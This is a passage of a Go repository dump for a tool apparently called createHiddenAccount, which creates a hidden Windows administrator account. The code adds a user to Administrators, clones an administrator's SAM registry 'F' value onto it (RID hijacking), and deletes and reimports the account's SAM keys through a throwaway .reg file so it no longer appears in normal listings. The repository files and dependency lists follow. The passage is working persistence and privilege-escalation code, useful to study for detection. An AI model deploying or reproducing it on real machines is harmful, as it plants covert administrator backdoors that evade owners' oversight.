35 | fmt.Printf("[-] Not Found %s user", cloneuser) 36 | fmt.Println("[-] Failed to add hidden user.") 37 | os.Exit(3) 38 | } 39 | common.DetermineRegistryPermissions("SAM\\SAM\\Domains\\Account\\Users\\Names\\" + cloneuser) 40 | // 1. Get User RID 41 | NamesUserNamePath := "SAM\\SAM\\Domains\\Account\\Users\\Names\\" + username 42 | NamesAdministratorPath := "SAM\\SAM\\Domains\\Account\\Users\\Names\\" + cloneuser 43 | 44 | _, UserNameIntRID := GetRegistryValue(NamesUserNamePath, "") 45 | _, AdministratorIntRID := GetRegistryValue(NamesAdministratorPath, "") 46 | 47 | UserNameRID := strconv.FormatUint(uint64(UserNameIntRID), 16) 48 | fmt.Printf("[+] %s RID: %v\n", username, strings.ToUpper(UserNameRID)) 49 | UserNameHexRID := "00000" + UserNameRID 50 | if UserNameRID == string(0) { 51 | fmt.Println("Failed to get user RID value.") 52 | fmt.Printf("[-] Failed to Delete %s User\n", username) 53 | os.Exit(3) 54 | } 55 | 56 | AdministratorRID := strconv.FormatUint(uint64(AdministratorIntRID), 16) 57 | fmt.Printf("[+] %s RID: %v\n", cloneuser, strings.ToUpper(AdministratorRID)) 58 | AdministratorHexRID := "00000" + AdministratorRID 59 | 60 | UsersUserNamePath := "SAM\\SAM\\Domains\\Account\\Users\\" + strings.ToUpper(UserNameHexRID) 61 | UsersAdministratorPath := "SAM\\SAM\\Domains\\Account\\Users\\" + strings.ToUpper(AdministratorHexRID) 62 | 63 | // 2. Get User Registry 64 | var UserRegistry UserRegistry 65 | UserRegistry.F, _ = GetRegistryValue(UsersUserNamePath, "F") 66 | UserRegistry.ForcePasswordReset, _ = GetRegistryValue(UsersUserNamePath, "ForcePasswordReset") 67 | UserRegistry.SupplementalCredentials, _ = GetRegistryValue(UsersUserNamePath, "SupplementalCredentials") 68 | UserRegistry.V, _ = GetRegistryValue(UsersUserNamePath, "V") 69 | 70 | // 3. Delete User 71 | ret := DeleteWindowsApiUser(username) 72 | if ret != NET_API_STATUS_NERR_Success { 73 | fmt.Printf("[-] Failed to Delete %s User\n", username) 74 | } else { 75 | fmt.Printf("[+] Succeeded to Delete %s User using Windows API.\n", username) 76 | } 77 | 78 | // 4. Create User Registry 79 | 80 | // Create SAM\SAM\Domains\Account\Users\00000XXX 81 | CreateNewRegistery(UsersUserNamePath) 82 | key, _ := registry.OpenKey(registry.LOCAL_MACHINE, UsersUserNamePath, registry.ALL_ACCESS) 83 | defer key.Close() 84 | key.SetBinaryValue("F", UserRegistry.F) 85 | key.SetBinaryValue("ForcePasswordReset", UserRegistry.ForcePasswordReset) 86 | key.SetBinaryValue("SupplementalCredentials", UserRegistry.SupplementalCredentials) 87 | key.SetBinaryValue("V", UserRegistry.V) 88 | 89 | // Create SAM\SAM\Domains\Account\Users\Names\username 90 | 91 | UserNameReg := "Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\" + username + "]\n@=hex(" + UserNameRID + "):" 92 | ioutil.WriteFile(".sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg", []byte(UserNameReg), 0644) 93 | cmd := exec.Command("regedit", "/s", ".sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg") 94 | err := cmd.Run() 95 | if err != nil { 96 | log.Fatalf("cmd.Run() failed with %s\n", err) 97 | } 98 | os.Remove(".sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg") 99 | 100 | fmt.Println("[+] Registry imported successfully.") 101 | 102 | // 5. Replace User Registry 103 | ReplaceRegistryValue(UsersAdministratorPath, UsersUserNamePath) 104 | 105 | // 6. Enable User 106 | EnableUser(username) 107 | 108 | k := 0 109 | HiddenAccounts := CheckHiddenAccountsSub() 110 | for _, i := range HiddenAccounts { 111 | if i == username { 112 | k++ 113 | } 114 | } 115 | if k == 1 { 116 | fmt.Println("[+] Successfully add hidden user.") 117 | } else { 118 | fmt.Println("[-] Failed to add hidden user.") 119 | } 120 | 121 | } 122 | 123 | func GetRegistryValue(path, NamesType string) ([]byte, uint32) { 124 | key, err := registry.OpenKey(registry.LOCAL_MACHINE, path, registry.ALL_ACCESS) 125 | if err != nil { // Registry Access is denied 126 | fmt.Printf("[-] Registry %s\n", err) 127 | } 128 | defer key.Close() 129 | 130 | value, rid, _ := key.GetBinaryValue(NamesType) 131 | return value, rid 132 | } 133 | 134 | func ReplaceRegistryValue(UsersAdministratorPath, UsersUserNamePath string) { 135 | common.DetermineRegistryPermissions(UsersAdministratorPath) 136 | AdministratorFVaule, _ := GetRegistryValue(UsersAdministratorPath, "F") 137 | 138 | key, err := registry.OpenKey(registry.LOCAL_MACHINE, UsersUserNamePath, registry.ALL_ACCESS) 139 | if err != nil { // Registry Access is denied 140 | fmt.Printf("[-] Registry %s\n", err) 141 | } 142 | 143 | err = key.SetBinaryValue("F", AdministratorFVaule) 144 | if err != nil { 145 | fmt.Printf("[-] %s\n", err) 146 | } else { 147 | fmt.Println("[+] Registry replaced successfully.") 148 | } 149 | } 150 | 151 | func CreateNewRegistery(path string) { 152 | key, _, err := registry.CreateKey(registry.LOCAL_MACHINE, path, registry.ALL_ACCESS) 153 | if err != nil { 154 | fmt.Printf("[-] Registry %s\n", err) 155 | } 156 | defer key.Close() 157 | } 158 | -------------------------------------------------------------------------------- /core/Users.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "fmt" 5 | so "github.com/iamacarpet/go-win64api/shared" 6 | "os" 7 | "syscall" 8 | "time" 9 | "unsafe" 10 | ) 11 | 12 | // Reference code: https://github.com/iamacarpet/go-win64api/blob/master/users.go 13 | 14 | var ( 15 | modNetapi32 = syscall.NewLazyDLL("netapi32.dll") 16 | usrNetUserEnum = modNetapi32.NewProc("NetUserEnum") 17 | usrNetUserAdd = modNetapi32.NewProc("NetUserAdd") 18 | usrNetUserDel = modNetapi32.NewProc("NetUserDel") 19 | usrNetUserGetInfo = modNetapi32.NewProc("NetUserGetInfo") 20 | usrNetUserSetInfo = modNetapi32.NewProc("NetUserSetInfo") 21 | usrNetApiBufferFree = modNetapi32.NewProc("NetApiBufferFree") 22 | usrNetLocalGroupAddMembers = modNetapi32.NewProc("NetLocalGroupAddMembers") 23 | ) 24 | 25 | const ( 26 | NET_API_STATUS_NERR_Success = 0 27 | USER_PRIV_USER = 1 28 | USER_UF_SCRIPT = 1 29 | USER_UF_ACCOUNTDISABLE = 2 30 | USER_UF_NORMAL_ACCOUNT = 512 31 | USER_UF_DONT_EXPIRE_PASSWD = 65536 32 | USER_FILTER_NORMAL_ACCOUNT = 0x0002 33 | USER_MAX_PREFERRED_LENGTH = 0xFFFFFFFF 34 | USER_UF_LOCKOUT = 16 35 | USER_UF_PASSWD_CANT_CHANGE = 64 36 | USER_PRIV_ADMIN = 2 37 | ) 38 | 39 | type LOCALGROUP_MEMBERS_INFO_3 struct { 40 | Lgrmi3_domainandname *uint16 41 | } 42 | 43 | type USER_INFO_1 struct { 44 | Usri1_name *uint16 45 | Usri1_password *uint16 46 | Usri1_password_age uint32 47 | Usri1_priv uint32 48 | Usri1_home_dir *uint16 49 | Usri1_comment *uint16 50 | Usri1_flags uint32 51 | Usri1_script_path *uint16 52 | } 53 | 54 | type USER_INFO_2 struct { 55 | Usri2_name *uint16 56 | Usri2_password *uint16 57 | Usri2_password_age uint32 58 | Usri2_priv uint32 59 | Usri2_home_dir *uint16 60 | Usri2_comment *uint16 61 | Usri2_flags uint32 62 | Usri2_script_path *uint16 63 | Usri2_auth_flags uint32 64 | Usri2_full_name *uint16 65 | Usri2_usr_comment *uint16 66 | Usri2_parms *uint16 67 | Usri2_workstations *uint16 68 | Usri2_last_logon uint32 69 | Usri2_last_logoff uint32 70 | Usri2_acct_expires uint32 71 | Usri2_max_storage uint32 72 | Usri2_units_per_week uint32 73 | Usri2_logon_hours uintptr 74 | Usri2_bad_pw_count uint32 75 | Usri2_num_logons uint32 76 | Usri2_logon_server *uint16 77 | Usri2_country_code uint32 78 | Usri2_code_page uint32 79 | } 80 | 81 | type USER_INFO_1003 struct { 82 | Usri1003_password *uint16 83 | } 84 | 85 | type USER_INFO_1008 struct { 86 | Usri1008_flags uint32 87 | } 88 | 89 | type USER_INFO_1011 struct { 90 | Usri1011_full_name *uint16 91 | } 92 | 93 | // USER_INFO_1052 is the Go representation of the Windwos _USER_INFO_1052 struct 94 | // used to set a user's profile directory. 95 | // 96 | // See: https://docs.microsoft.com/en-us/windows/desktop/api/lmaccess/ns-lmaccess-_user_info_1052 97 | type USER_INFO_1052 struct { 98 | Useri1052_profile *uint16 99 | } 100 | 101 | type UserAddOptions struct { 102 | // Required 103 | Username string 104 | Password string 105 | 106 | // Optional 107 | FullName string 108 | PrivLevel uint32 109 | HomeDir string 110 | Comment string 111 | ScriptPath string 112 | UserGroup string 113 | } 114 | 115 | type LocalUser struct { 116 | Username string `json:"username"` 117 | FullName string `json:"fullName"` 118 | IsEnabled bool `json:"isEnabled"` 119 | IsLocked bool `json:"isLocked"` 120 | IsAdmin bool `json:"isAdmin"` 121 | PasswordNeverExpires bool `json:"passwordNeverExpires"` 122 | NoChangePassword bool `json:"noChangePassword"` 123 | PasswordAge time.Duration `json:"passwordAge"` 124 | LastLogon time.Time `json:"lastLogon"` 125 | BadPasswordCount uint32 `json:"badPasswordCount"` 126 | NumberOfLogons uint32 `json:"numberOfLogons"` 127 | } 128 | 129 | // UserAddEx creates a new user account. 130 | // As opposed to the simpler UserAdd, UserAddEx allows specification of full 131 | // level 1 information while creating a user. 132 | func UserAddEx(opts UserAddOptions) (bool, error) { 133 | var parmErr uint32 134 | var err error 135 | uInfo := USER_INFO_1{ 136 | Usri1_priv: opts.PrivLevel, 137 | Usri1_flags: USER_UF_SCRIPT | USER_UF_NORMAL_ACCOUNT | USER_UF_DONT_EXPIRE_PASSWD, 138 | } 139 | uInfo.Usri1_name, err = syscall.UTF16PtrFromString(opts.Username) 140 | if err != nil { 141 | return false, fmt.Errorf("[-] Unable to encode username to UTF16: %s\n", err) 142 | } 143 | uInfo.Usri1_password, err = syscall.UTF16PtrFromString(opts.Password) 144 | if err != nil { 145 | return false, fmt.Errorf("[-] Unable to encode password to UTF16: %s\n", err) 146 | } 147 | if opts.Comment != "" { 148 | uInfo.Usri1_comment, err = syscall.UTF16PtrFromString(opts.Comment) 149 | if err != nil { 150 | return false, fmt.Errorf("[-] Unable to encode comment to UTF16: %s\n", err) 151 | } 152 | } 153 | if opts.HomeDir != "" { 154 | uInfo.Usri1_home_dir, err = syscall.UTF16PtrFromString(opts.HomeDir) 155 | if err != nil { 156 | return false, fmt.Errorf("[-] Unable to encode home directory path to UTF16: %s\n", err) 157 | } 158 | } 159 | if opts.ScriptPath != "" { 160 | uInfo.Usri1_script_path, err = syscall.UTF16PtrFromString(opts.HomeDir) 161 | if err != nil { 162 | return false, fmt.Errorf("[-] Unable to encode script path to UTF16: %s\n", err) 163 | } 164 | } 165 | ret, _, _ := usrNetUserAdd.Call( 166 | uintptr(0), 167 | uintptr(uint32(1)), 168 | uintptr(unsafe.Pointer(&uInfo)), 169 | uintptr(unsafe.Pointer(&parmErr)), 170 | ) 171 | if ret != NET_API_STATUS_NERR_Success { 172 | if ret == 2224 { 173 | fmt.Printf("[!] There is already %s user in the current system, please try another name.\n", opts.Username) 174 | os.Exit(3) 175 | } else if ret == 2245 { 176 | fmt.Printf("[!] The current %s password complexity is low, please use a stronger password.\n", opts.Password) 177 | os.Exit(3) 178 | } else if ret == 2202 { 179 | fmt.Println("[!] Invalid user name.") 180 | os.Exit(3) 181 | } 182 | return false, fmt.Errorf("[-] Unable to process: status=%d error=%d, Please confirm whether you have administrator privileges.\n", ret, parmErr) 183 | } 184 | 185 | fmt.Printf("[+] Successfully added %s user.\n", opts.Username) 186 | //common.DetermineRegistryPermissions("SAM\\SAM\\Domains\\Account\\Users\\Names\\" + opts.Username) 187 | return AddGroupMembership(opts.Username, opts.UserGroup) 188 | } 189 | 190 | // UserAdd creates a new user account with the given username, full name, and 191 | // password. 192 | // The new account will have the standard User privilege level. 193 | func UserAdd(username string, password string) (bool, error) { 194 | return UserAddEx(UserAddOptions{ 195 | Username: username, 196 | Password: password, 197 | FullName: "", 198 | UserGroup: "Administrators", 199 | PrivLevel: USER_PRIV_USER, 200 | }) 201 | } 202 | 203 | // AddGroupMembership adds the user as a member of the specified group. 204 | func AddGroupMembership(username, groupname string) (bool, error) { 205 | //hn, _ := os.Hostname() 206 | //uPointer, err := syscall.UTF16PtrFromString(hn + `\` + username) 207 | uPointer, err := syscall.UTF16PtrFromString(username) 208 | if err != nil { 209 | return false, fmt.Errorf("[-] Unable to encode username to UTF16\n") 210 | } 211 | gPointer, err := syscall.UTF16PtrFromString(groupname) 212 | if err != nil { 213 | return false, fmt.Errorf("[-] unable to encode group name to UTF16\n") 214 | } 215 | var uArray = make([]LOCALGROUP_MEMBERS_INFO_3, 1) 216 | uArray[0] = LOCALGROUP_MEMBERS_INFO_3{ 217 | Lgrmi3_domainandname: uPointer, 218 | } 219 | ret, _, _ := usrNetLocalGroupAddMembers.Call( 220 | uintptr(0), // servername 221 | uintptr(unsafe.Pointer(gPointer)), // group name 222 | uintptr(uint32(3)), // level 223 | uintptr(unsafe.Pointer(&uArray[0])), // user array. 224 | uintptr(uint32(len(uArray))), 225 | ) 226 | if ret == NET_API_STATUS_NERR_Success { 227 | fmt.Printf("[+] Successfully added %s user to administrator group.\n", username) 228 | } else if int(ret) == 1387 { 229 | return false, fmt.Errorf("[-] A member could not be added to or removed from the local group because the member does not exist.\n") 230 | } else { 231 | return false, fmt.Errorf("[-] unable to process, Error code: %d\n", ret) 232 | } 233 | return true, err 234 | } 235 | 236 | // Enable User 237 | func EnableUser(username string) { 238 | eFlags, err := userGetFlags(username) 239 | if err != nil { 240 | fmt.Println(err) 241 | fmt.Printf("[-] Error while getting existing flags, %s.\n", err) 242 | } 243 | eFlags &^= USER_UF_ACCOUNTDISABLE // clear bits we want to remove. 244 | userSetFlags(username, eFlags) 245 | } 246 | 247 | func userGetFlags(username string) (uint32, error) { 248 | var dataPointer uintptr 249 | uPointer, err := syscall.UTF16PtrFromString(username) 250 | if err != nil { 251 | return 0, fmt.Errorf("[-] unable to encode username to UTF16\n") 252 | } 253 | _, _, _ = usrNetUserGetInfo.Call( 254 | uintptr(0), // servername 255 | uintptr(unsafe.Pointer(uPointer)), // username 256 | uintptr(uint32(1)), // level, request USER_INFO_1 257 | uintptr(unsafe.Pointer(&dataPointer)), // Pointer to struct. 258 | ) 259 | defer usrNetApiBufferFree.Call(dataPointer) 260 | 261 | if dataPointer == uintptr(0) { 262 | return 0, fmt.Errorf("[-] unable to get data structure\n") 263 | } 264 | 265 | var data = (*USER_INFO_1)(unsafe.Pointer(dataPointer)) 266 | return data.Usri1_flags, nil 267 | } 268 | 269 | func userSetFlags(username string, flags uint32) (bool, error) { 270 | var errParam uint32 271 | uPointer, err := syscall.UTF16PtrFromString(username) 272 | if err != nil { 273 | return false, fmt.Errorf("[-] Unable to encode username to UTF16\n") 274 | } 275 | ret, _, _ := usrNetUserSetInfo.Call( 276 | uintptr(0), // servername 277 | uintptr(unsafe.Pointer(uPointer)), // username 278 | uintptr(uint32(1008)), // level 279 | uintptr(unsafe.Pointer(&USER_INFO_1008{Usri1008_flags: flags})), 280 | uintptr(unsafe.Pointer(&errParam)), 281 | ) 282 | if ret != NET_API_STATUS_NERR_Success { 283 | return false, fmt.Errorf("[-] Unable to process. %d\n", ret) 284 | } 285 | return true, nil 286 | } 287 | 288 | func ListLocalUsers() ([]so.LocalUser, error) { 289 | var ( 290 | dataPointer uintptr 291 | resumeHandle uintptr 292 | entriesRead uint32 293 | entriesTotal uint32 294 | sizeTest USER_INFO_2 295 | retVal = make([]so.LocalUser, 0) 296 | ) 297 | 298 | ret, _, _ := usrNetUserEnum.Call( 299 | uintptr(0), // servername 300 | uintptr(uint32(2)), // level, USER_INFO_2 301 | uintptr(uint32(USER_FILTER_NORMAL_ACCOUNT)), // filter, only "normal" accounts. 302 | uintptr(unsafe.Pointer(&dataPointer)), // struct buffer for output data. 303 | uintptr(uint32(USER_MAX_PREFERRED_LENGTH)), // allow as much memory as required. 304 | uintptr(unsafe.Pointer(&entriesRead)), 305 | uintptr(unsafe.Pointer(&entriesTotal)), 306 | uintptr(unsafe.Pointer(&resumeHandle)), 307 | ) 308 | if ret != NET_API_STATUS_NERR_Success { 309 | return nil, fmt.Errorf("error fetching user entry") 310 | } else if dataPointer == uintptr(0) { 311 | return nil, fmt.Errorf("null pointer while fetching entry") 312 | } 313 | 314 | var iter = dataPointer 315 | for i := uint32(0); i < entriesRead; i++ { 316 | var data = (*USER_INFO_2)(unsafe.Pointer(iter)) 317 | 318 | ud := so.LocalUser{ 319 | Username: UTF16toString(data.Usri2_name), 320 | FullName: UTF16toString(data.Usri2_full_name), 321 | PasswordAge: (time.Duration(data.Usri2_password_age) * time.Second), 322 | LastLogon: time.Unix(int64(data.Usri2_last_logon), 0), 323 | BadPasswordCount: data.Usri2_bad_pw_count, 324 | NumberOfLogons: data.Usri2_num_logons, 325 | } 326 | 327 | if (data.Usri2_flags & USER_UF_ACCOUNTDISABLE) != USER_UF_ACCOUNTDISABLE { 328 | ud.IsEnabled = true 329 | } 330 | if (data.Usri2_flags & USER_UF_LOCKOUT) == USER_UF_LOCKOUT { 331 | ud.IsLocked = true 332 | } 333 | if (data.Usri2_flags & USER_UF_PASSWD_CANT_CHANGE) == USER_UF_PASSWD_CANT_CHANGE { 334 | ud.NoChangePassword = true 335 | } 336 | if (data.Usri2_flags & USER_UF_DONT_EXPIRE_PASSWD) == USER_UF_DONT_EXPIRE_PASSWD { 337 | ud.PasswordNeverExpires = true 338 | } 339 | if data.Usri2_priv == USER_PRIV_ADMIN { 340 | ud.IsAdmin = true 341 | } 342 | 343 | retVal = append(retVal, ud) 344 | 345 | iter = uintptr(unsafe.Pointer(iter + unsafe.Sizeof(sizeTest))) 346 | } 347 | usrNetApiBufferFree.Call(dataPointer) 348 | return retVal, nil 349 | } 350 | 351 | // UTF16toString converts a pointer to a UTF16 string into a Go string. 352 | func UTF16toString(p *uint16) string { 353 | return syscall.UTF16ToString((*[4096]uint16)(unsafe.Pointer(p))[:]) 354 | } 355 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module wgpsec.org/createHiddenAccount 2 | 3 | go 1.17 4 | 5 | require ( 6 | github.com/iamacarpet/go-win64api v0.0.0-20211130162011-82e31fe23f80 7 | golang.org/x/sys v0.0.0-20220114195835-da31bd327af9 8 | ) 9 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | bitbucket.org/creachadair/stringset v0.0.9/go.mod h1:t+4WcQ4+PXTa8aQdNKe40ZP6iwesoMFWAxPGd3UGjyY= 2 | github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= 3 | github.com/StackExchange/wmi v1.2.0/go.mod h1:3eOhrUMpNV+6aFIbp5/iudMxNCF27Vw2OZgy4xEx0Fg= 4 | github.com/capnspacehook/taskmaster v0.0.0-20210519235353-1629df7c85e9/go.mod h1:257CYs3Wd/CTlLQ3c72jKv+fFE2MV3WPNnV5jiroYUU= 5 | github.com/creachadair/staticfile v0.1.3/go.mod h1:a3qySzCIXEprDGxk6tSxSI+dBBdLzqeBOMhZ+o2d3pM= 6 | github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo= 7 | github.com/fsnotify/fsnotify v1.4.9/go.mod h1:znqG4EE+3YCdAaPaxE2ZRY/06pZUdp0tY4IgpuI1SZQ= 8 | github.com/go-ole/go-ole v1.2.4/go.mod h1:XCwSNxSkXRo4vlyPy93sltvi/qJq0jqQhjqQNIwKuxM= 9 | github.com/go-ole/go-ole v1.2.5/go.mod h1:pprOEPIfldk/42T2oK7lQ4v4JSDwmV0As9GaiUsvbm0= 10 | github.com/go-ole/go-ole v1.2.6/go.mod h1:pprOEPIfldk/42T2oK7lQ4v4JSDwmV0As9GaiUsvbm0= 11 | github.com/godbus/dbus v4.1.0+incompatible/go.mod h1:/YcGZj5zSblfDWMMoOzV4fas9FZnQYTkDnsGvmh2Grw= 12 | github.com/golang/glog v0.0.0-20210429001901-424d2337a529/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= 13 | github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= 14 | github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= 15 | github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= 16 | github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= 17 | github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= 18 | github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= 19 | github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= 20 | github.com/google/aukera v0.0.0-20201117230544-d145c8357fea/go.mod h1:oXqTZORBzdwQ6L32YjJmaPajqIV/hoGEouwpFMf4cJE= 21 | github.com/google/cabbie v1.0.2/go.mod h1:6MmHaUrgfabehCHAIaxdrbmvHSxUVXj3Abs08FMABSo= 22 | github.com/google/glazier v0.0.0-20210617205946-bf91b619f5d4/go.mod h1:g7oyIhindbeebnBh0hbFua5rv6XUt/nweDwIWdvxirg= 23 | github.com/google/glazier v0.0.0-20211029225403-9f766cca891d/go.mod h1:h2R3DLUecGbLSyi6CcxBs5bdgtJhgK+lIffglvAcGKg= 24 | github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= 25 | github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= 26 | github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= 27 | github.com/google/go-cmp v0.5.4/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= 28 | github.com/google/go-cmp v0.5.6/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= 29 | github.com/google/logger v1.1.0/go.mod h1:w7O8nrRr0xufejBlQMI83MXqRusvREoJdaAxV+CoAB4= 30 | github.com/google/logger v1.1.1/go.mod h1:BkeJZ+1FhQ+/d087r4dzojEg1u2ZX+ZqG1jTUrLM+zQ= 31 | github.com/google/subcommands v1.2.0/go.mod h1:ZjhPrFU+Olkh9WazFPsl27BQ4UPiG37m3yTrtFlrHVk= 32 | github.com/google/uuid v1.3.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= 33 | github.com/google/winops v0.0.0-20210803215038-c8511b84de2b/go.mod h1:ShbX8v8clPm/3chw9zHVwtW3QhrFpL8mXOwNxClt4pg= 34 | github.com/groob/plist v0.0.0-20210519001750-9f754062e6d6/go.mod h1:itkABA+w2cw7x5nYUS/pLRef6ludkZKOigbROmCTaFw= 35 | github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU= 36 | github.com/iamacarpet/go-win64api v0.0.0-20210311141720-fe38760bed28/go.mod h1:oGJx9dz0Ny7HC7U55RZ0Smd6N9p3hXP/+hOFtuYrAxM= 37 | github.com/iamacarpet/go-win64api v0.0.0-20211130162011-82e31fe23f80 h1:UOuVxO8DxSote09McZFyO1Wxd/DA93gfHiNReP7c5wU= 38 | github.com/iamacarpet/go-win64api v0.0.0-20211130162011-82e31fe23f80/go.mod h1:B7zFQPAznj+ujXel5X+LUoK3LgY6VboCdVYHZNn7gpg= 39 | github.com/nxadm/tail v1.4.4/go.mod h1:kenIhsEOeOJmVchQTgglprH7qJGnHDVpk1VPCcaMI8A= 40 | github.com/onsi/ginkgo v1.6.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE= 41 | github.com/onsi/ginkgo v1.12.1/go.mod h1:zj2OWP4+oCPe1qIXoGWkgMRwljMUYCdkwsT2108oapk= 42 | github.com/onsi/gomega v1.7.1/go.mod h1:XdKZgCCFLUoM/7CFJVPcG8C1xQ1AJ0vpAezJrB7JYyY= 43 | github.com/onsi/gomega v1.10.2/go.mod h1:iN09h71vgCQne3DLsj+A5owkum+a2tYe+TOCB1ybHNo= 44 | github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= 45 | github.com/rickb777/date v1.14.2/go.mod h1:swmf05C+hN+m8/Xh7gEq3uB6QJDNc5pQBWojKdHetOs= 46 | github.com/rickb777/plural v1.2.2/go.mod h1:xyHbelv4YvJE51gjMnHvk+U2e9zIysg6lTnSQK8XUYA= 47 | github.com/robfig/cron/v3 v3.0.1/go.mod h1:eQICP3HwyT7UooqI/z+Ov+PtYAWygg1TEWWzGIFLtro= 48 | github.com/scjalliance/comshim v0.0.0-20190308082608-cf06d2532c4e/go.mod h1:9Tc1SKnfACJb9N7cw2eyuI6xzy845G7uZONBsi5uPEA= 49 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 50 | golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= 51 | golang.org/x/net v0.0.0-20180906233101-161cd47e91fd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= 52 | golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 53 | golang.org/x/net v0.0.0-20200520004742-59133d7f0dd7/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= 54 | golang.org/x/net v0.0.0-20201006153459-a7d1128ccaa0/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= 55 | golang.org/x/net v0.0.0-20210614182718-04defd469f4e/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= 56 | golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= 57 | golang.org/x/sys v0.0.0-20180909124046-d0be0721c37e/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 58 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 59 | golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 60 | golang.org/x/sys v0.0.0-20190904154756-749cb33beabd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 61 | golang.org/x/sys v0.0.0-20190916202348-b4ddaad3f8a3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 62 | golang.org/x/sys v0.0.0-20191005200804-aed5e4c7ecf9/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 63 | golang.org/x/sys v0.0.0-20191120155948-bd437916bb0e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 64 | golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 65 | golang.org/x/sys v0.0.0-20200622182413-4b0db7f3f76b/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 66 | golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 67 | golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 68 | golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 69 | golang.org/x/sys v0.0.0-20210426230700-d19ff857e887/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 70 | golang.org/x/sys v0.0.0-20210601080250-7ecdf8ef093b/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 71 | golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 72 | 